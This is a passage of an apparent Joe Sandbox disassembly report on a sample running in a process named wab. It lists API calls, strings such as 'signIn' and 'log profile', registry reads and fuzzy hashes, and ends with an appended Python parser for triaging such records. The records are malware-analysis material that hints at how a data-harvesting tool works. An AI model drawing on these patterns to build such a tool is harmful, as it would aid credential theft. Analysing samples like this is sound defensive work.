                    • _wcsicmp.MSVCRT ref: 00444D09
                    • _wcsicmp.MSVCRT ref: 00444D1E
                    • _wcsicmp.MSVCRT ref: 00444D33
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$wcslen$_memicmp
                    • String ID: .save$http://$https://$log profile$signIn
                    • API String ID: 1214746602-2708368587
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                    • String ID:
                    • API String ID: 2313361498-0
                    APIs
                    • GetClientRect.USER32(?,?), ref: 00405F65
                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                    • GetWindow.USER32(00000000), ref: 00405F80
                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$ItemMessageRectSend$Client
                    • String ID:
                    • API String ID: 2047574939-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                    • String ID:
                    • API String ID: 4218492932-0
                    APIs
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                    • memcpy.MSVCRT ref: 0044A8BF
                    • memcpy.MSVCRT ref: 0044A90C
                    • memcpy.MSVCRT ref: 0044A988
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                    • memcpy.MSVCRT ref: 0044A9D8
                    • memcpy.MSVCRT ref: 0044AA19
                    • memcpy.MSVCRT ref: 0044AA4A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                    • API String ID: 3510742995-2446657581
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                    • memset.MSVCRT ref: 00405ABB
                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                    • SetFocus.USER32(?), ref: 00405B76
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscat
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 384018552-4153097237
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetwcschr
                    • String ID: 0$6
                    • API String ID: 2029023288-3849865405
                    APIs
                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                    • memset.MSVCRT ref: 00405455
                    • memset.MSVCRT ref: 0040546C
                    • memset.MSVCRT ref: 00405483
                    • memcpy.MSVCRT ref: 00405498
                    • memcpy.MSVCRT ref: 004054AD
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy$ErrorLast
                    • String ID: 6$\
                    • API String ID: 404372293-1284684873
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                    • wcscpy.MSVCRT ref: 0040A0D9
                    • wcscat.MSVCRT ref: 0040A0E6
                    • wcscat.MSVCRT ref: 0040A0F5
                    • wcscpy.MSVCRT ref: 0040A107
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                    • String ID:
                    • API String ID: 1331804452-0
                    APIs
                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: advapi32.dll
                    • API String ID: 2012295524-4050573280
                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                    APIs
                    Strings
                    • <?xml version="1.0" ?>, xrefs: 0041007C
                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                    • <%s>, xrefs: 004100A6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                    • API String ID: 3473751417-2880344631
                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset
                    • String ID: %2.2X
                    • API String ID: 2521778956-791839006
                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscpy
                    • String ID: dialog_%d$general$menu_%d$strings
                    • API String ID: 999028693-502967061
                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memsetstrlen
                    • String ID:
                    • API String ID: 2350177629-0
                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                    • API String ID: 2221118986-1606337402
                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                    • String ID:
                    • API String ID: 265355444-0
                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                    • memset.MSVCRT ref: 0040C439
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    • memset.MSVCRT ref: 0040C4D0
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                    • String ID:
                    • API String ID: 1973883786-0
                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                    APIs
                    • memset.MSVCRT ref: 004116FF
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2618321458-3614832568
                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                    APIs
                    • memset.MSVCRT ref: 004185FC
                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@AttributesFilememset
                    • String ID:
                    • API String ID: 776155459-0
                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                    • malloc.MSVCRT ref: 00417524
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                    • String ID:
                    • API String ID: 2308052813-0
                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                    APIs
                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PathTemp$??3@
                    • String ID: %s\etilqs_$etilqs_
                    • API String ID: 1589464350-1420421710
                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                    APIs
                    • memset.MSVCRT ref: 0040FDD5
                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 0040FE1F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                    • String ID: <%s>%s</%s>$</item>$<item>
                    • API String ID: 1775345501-2769808009
                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                    APIs
                    • wcscpy.MSVCRT ref: 0041477F
                    • wcscpy.MSVCRT ref: 0041479A
                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$CloseCreateFileHandle
                    • String ID: General
                    • API String ID: 999786162-26480598
                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
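The function records above are easier to triage in bulk than by eye. The following parser is an added example, not part of the Joe Sandbox report or of any tool it identifies: it reads records in the format shown on this page (API call lines, `xrefs:` string lines and the `•  Key: value` fields, with `Instruction Fuzzy Hash` treated as the last field of a record) and applies three checks drawn from the records above: the `advapi32.dll` record that builds a System32 path and resolves five imports with `GetProcAddress`, the `Shell Folders` record that enumerates registry values, and the `CreateFileW` record that writes the `General` file. The decoding of `CreateFileW` arguments assumes the report lists them in the documented parameter order (name, access, share mode, security, disposition, flags, template); the report does not state this, so treat decoded names as a hint. The sample input is copied from those three records with indentation removed.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and triage their API use."""
import re

# Constructed sample: three records copied from the report above, whitespace trimmed.
SAMPLE_REPORT = r"""APIs
• Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
• Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
• Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Memory Dump Source
• Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
APIs
• Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Similarity
• API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
APIs
• wcscpy.MSVCRT ref: 0041477F
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
"""

# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: XXXXXXXX"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^.\s(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-F]{8})$"
)
XREF_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<addr>[0-9A-F]{8})$")   # string lines
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")               # metadata lines
END_KEY = "Instruction Fuzzy Hash"   # last field of every record on the page


def _new_record():
    return {"apis": [], "strings": [], "meta": {}}


def parse_records(text):
    """Split report text into records; each holds API calls, xref strings and metadata."""
    records, cur = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] is not None else []
            cur["apis"].append({"name": m["name"], "mod": m["mod"], "args": args,
                                "ref": m["ref"], "subcall": m["sub"]})
        elif m := XREF_RE.match(line):
            cur["strings"].append((m["text"], m["addr"]))
        elif m := KV_RE.match(line):
            cur["meta"][m["key"]] = m["val"]
            if m["key"] == END_KEY:
                records.append(cur)
                cur = _new_record()
    return records


# Documented CreateFileW constants; argument positions are an assumption about the report.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_create_file(call):
    """Name the access mask (arg 1) and creation disposition (arg 4); '?' stays unknown."""
    def hexarg(i):
        try:
            return int(call["args"][i], 16)
        except (IndexError, ValueError):
            return None
    access, disp = hexarg(1), hexarg(4)
    rights = [n for bit, n in ACCESS.items() if access is not None and access & bit]
    return {"access": "|".join(rights) or "unknown", "disposition": DISPOSITION.get(disp, "unknown")}


LOADERS = {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA"}
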